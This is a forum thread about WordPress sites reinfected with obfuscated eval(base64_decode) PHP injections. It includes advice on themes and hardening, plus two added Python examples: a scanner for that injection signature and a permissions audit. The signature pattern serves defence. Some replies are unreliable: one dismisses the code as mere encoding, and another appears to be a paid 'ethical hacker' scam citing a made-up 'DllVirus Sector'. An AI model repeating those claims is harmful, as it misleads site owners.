Hello friends, I am in big trouble because all my WordPress blogs are affected by a virus: eval(base64_decode('...')); Above is the virus or error which I am facing in all index and other files in my cPanel. I have cleared this error many times but it comes again and again. Please help me to solve this issue. Thanks.
You will need to get with your web host to do a full security scan of your website. If your host cannot do this, I would suggest switching to another web host. After the malware has been removed, you need to change all the passwords, and update all installations of WordPress to prevent this from happening again. Sent you a PM with more details as well.
You will never get rid of it. Let me guess. It's a free theme that you downloaded from somewhere, or a nulled script. This is a common script hidden in a lot of free themes. If you search "Free WordPress themes" in Google, the first 10 sites have themes with malware in them. Read here: http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/ The only way out is to do what the previous poster suggested, and do a clean install of WordPress, with a new database. Get rid of that theme altogether. Stop using free themes. This is why people don't use them. This is also why they are free. Because enough people will download them if they think they can save a buck. The only people you can trust for free themes are the WordPress repository, and reputable companies that you know. COMPANIES (like Woo Themes), not websites just because they look trustworthy. Some premium theme makers will have one or 2 themes for free.
Buy a premium WordPress theme and always update scripts and themes. Change your password from time to time. Avoid putting too many plugins in your blog. Plugins are more vulnerable than other things.
Thanks to all for the replies posted here. I think this happened because of the free theme I used. But tell me one thing: can I trust or use themes which are provided by WordPress?
I think you should contact your hosting provider. Long ago I also had this problem, because I used a nulled template. Yes, you should trust themes that are provided by WordPress. Good luck.
It's really a wonder for you. First of all, make a strong password (a combination of alphanumeric and special characters) for all your hosting and FTP accounts. The main cause of virus attacks is a weak password. Delete all your files from the server. If you have a backup, dump your backup onto the server.
Any free theme that IS NOT in the WordPress repository, you have to be suspicious of. Why isn't it? Either because it has malware, or adware. The exception is known, trusted companies like Woo Themes, Solostream and a few others that give a theme away every now and then: Free themes from WooThemes: http://www.woothemes.com/themes/free/ Free themes from Solostream: http://www.solostream.com/free-wordpress-themes/ These are the only 2 companies that I trust for free themes. Really affordable theme club: http://www.elegantthemes.com/gallery/ There may be one or 2 that I left out, but IDC how many sites people tell you about, theme sites that their friends own, or that they SAY they've used without a problem. You need to check them out. Most are garbage sites that people have just used for so long that they don't even know that they are infecting themselves. Most free theme sites have one purpose: to do sneaky stuff. Either backlinks for someone else, or scripts to run crap on your computer, website, or server.
Hello friends, I deleted all files and folders from cPanel and installed a new, fresh version of WordPress. But after a few days the malware is back and now I am facing the same issue again. Is this possible after cleaning the whole cPanel? If yes, then please tell me the permanent solution to get rid of the malware attack.
Have you changed your cPanel password, WordPress admin password, and FTP passwords? Also, are you running the latest version of WordPress? If this does not work, you need to find out where this is coming from. Check FTP logs, cPanel access logs and sshd logs to find out where this is coming from. Are you on a shared webhost or VPS/dedicated server?
Yes, I have changed the cPanel password and the WordPress admin passwords of all sites, and my host has already done a full scan of my account. But the problem is still there.
phpshells allow a user to get access to your account and make changes even though they don't know any of your passwords. The only thing you can do to get rid of this is to remove all the shells at once and change all passwords.
This helps a LOT if you have files full of that nasty code. You still have to figure out where they are getting in because they will do it again. http://www.lemurcake.com/php/wordpress/security/wordpress-hack-cechirecom-com-js-php-cleanup/
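Added example, not part of the thread and not any poster's code: a small Python scanner that walks a site tree and reports every PHP file, with line numbers, containing the eval(base64_decode( call quoted in the first post, so all infected files can be found and cleaned in one pass. The gzinflate-wrapped variant, the file extensions checked and the sample tree (harmless payload 'QQ==') are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# The injected call quoted in the first post, plus the gzinflate-wrapped
# variant (an assumption; only the plain form appears in the thread).
INJECT_RE = re.compile(
    rb"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".inc")

def scan_tree(root):
    """Return sorted (relative_path, [line numbers]) for PHP files that match."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            lines = [data.count(b"\n", 0, m.start()) + 1
                     for m in INJECT_RE.finditer(data)]
            if lines:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, lines))
    return sorted(findings)

def demo():
    """Build a constructed sample tree (harmless payload 'QQ==') and scan it."""
    sample = {
        "index.php": b"<?php eval(base64_decode('QQ==')); ?>\n<?php // real code\n",
        "wp-content/themes/free/footer.php":
            b"<?php\n// footer\nEVAL ( gzinflate( base64_decode ('QQ==')));\n",
        "wp-includes/clean.php": b"<?php $x = base64_decode($y);\n",
        "readme.html": b"eval(base64_decode('QQ=='))\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in sample.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, lines in demo():
        print(rel, lines)
```

A plain base64_decode() call without eval is not reported, so legitimate uses in WordPress core do not drown out the injected lines.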
I can clear the malware as well as the Dynamic DllVirus Sector. I am an ethical hacker. But it costs $100 to clear the malware. I'll finish it in an hour.
I think it can be simply avoided by not using themes with scripts inside. Those with footer coded always looked suspicious to me. I once got an SQL injection. Was cleaning all files manually for many hours...
That's no virus, that's encoding of the file. Base 64 to know information. Search on Google, keyword: decode base 64
There is a chance your WP database is infected. A few good tips about how to secure your WP are here: http://www.askfrank.net/how-to-secure-wordpress-blog-from-being-hacked-2012/ Changing the default wp_ prefix for the database is the 1st step. Hiding your wp-config.php by moving it up 1 level so it's not publicly accessible, and chmod it to 600 or 400. There are many ways to secure WordPress from hackers. Most likely your uploads folder is not secured. Go to yourblogurl.com/uploads/ and if you can see the content then everybody can see it. All your plugins etc. To secure it, you need to create an empty index.php file inside your uploads folder. Hope this helps.
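Added example, not part of the thread: a Python audit of two of the hardening steps from the post above, checking that wp-config.php carries no group or other permission bits (600 or 400) and that every directory under uploads has an index file. Flagging PHP files inside uploads is an extra check added here, because an empty index.php only hides the directory listing. The default path wp-content/uploads, a wp-config.php left in the site root, and the sample tree are assumptions constructed for the demonstration.

```python
import os
import stat
import tempfile

def audit(root, uploads_rel="wp-content/uploads"):
    """Return sorted hardening findings for the WordPress tree at root."""
    issues = []
    cfg = os.path.join(root, "wp-config.php")
    if os.path.isfile(cfg):
        mode = stat.S_IMODE(os.stat(cfg).st_mode)
        if mode & 0o077:  # any group/other bit: looser than 600 or 400
            issues.append("wp-config.php mode %03o" % mode)
    for dirpath, _dirs, files in os.walk(os.path.join(root, uploads_rel)):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        lower = [f.lower() for f in files]
        if "index.php" not in lower and "index.html" not in lower:
            issues.append("no index file in " + rel)
        for f in files:
            if f.lower().endswith(".php") and f.lower() != "index.php":
                issues.append("php file in uploads: %s/%s" % (rel, f))
    return sorted(issues)

def demo():
    """Audit a constructed tree before and after applying the thread's fixes."""
    with tempfile.TemporaryDirectory() as root:
        year = os.path.join(root, "wp-content", "uploads", "2012")
        os.makedirs(year)
        cfg = os.path.join(root, "wp-config.php")
        stray = os.path.join(year, "cache.php")
        for path in (cfg, stray, os.path.join(year, "photo.jpg"),
                     os.path.join(root, "wp-content", "uploads", "index.php")):
            open(path, "wb").close()  # empty constructed files
        os.chmod(cfg, 0o644)
        before = audit(root)
        # Apply the fixes: tighten the config, drop the stray PHP file, add an index.
        os.chmod(cfg, 0o600)
        os.remove(stray)
        open(os.path.join(year, "index.php"), "wb").close()
        return before, audit(root)

if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```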